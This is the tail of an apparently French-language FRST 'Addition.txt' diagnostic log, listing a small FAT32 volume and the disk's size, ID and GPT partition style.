\\?\Volume{9572eb2f-4073-40e8-ba57-61f49b08fcfe}\ () (Fixed) (Total:0.5 GB) (Free:0.47 GB) FAT32
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: A944F590)
Partition: GPT.
==================== Fin de Addition.txt ============================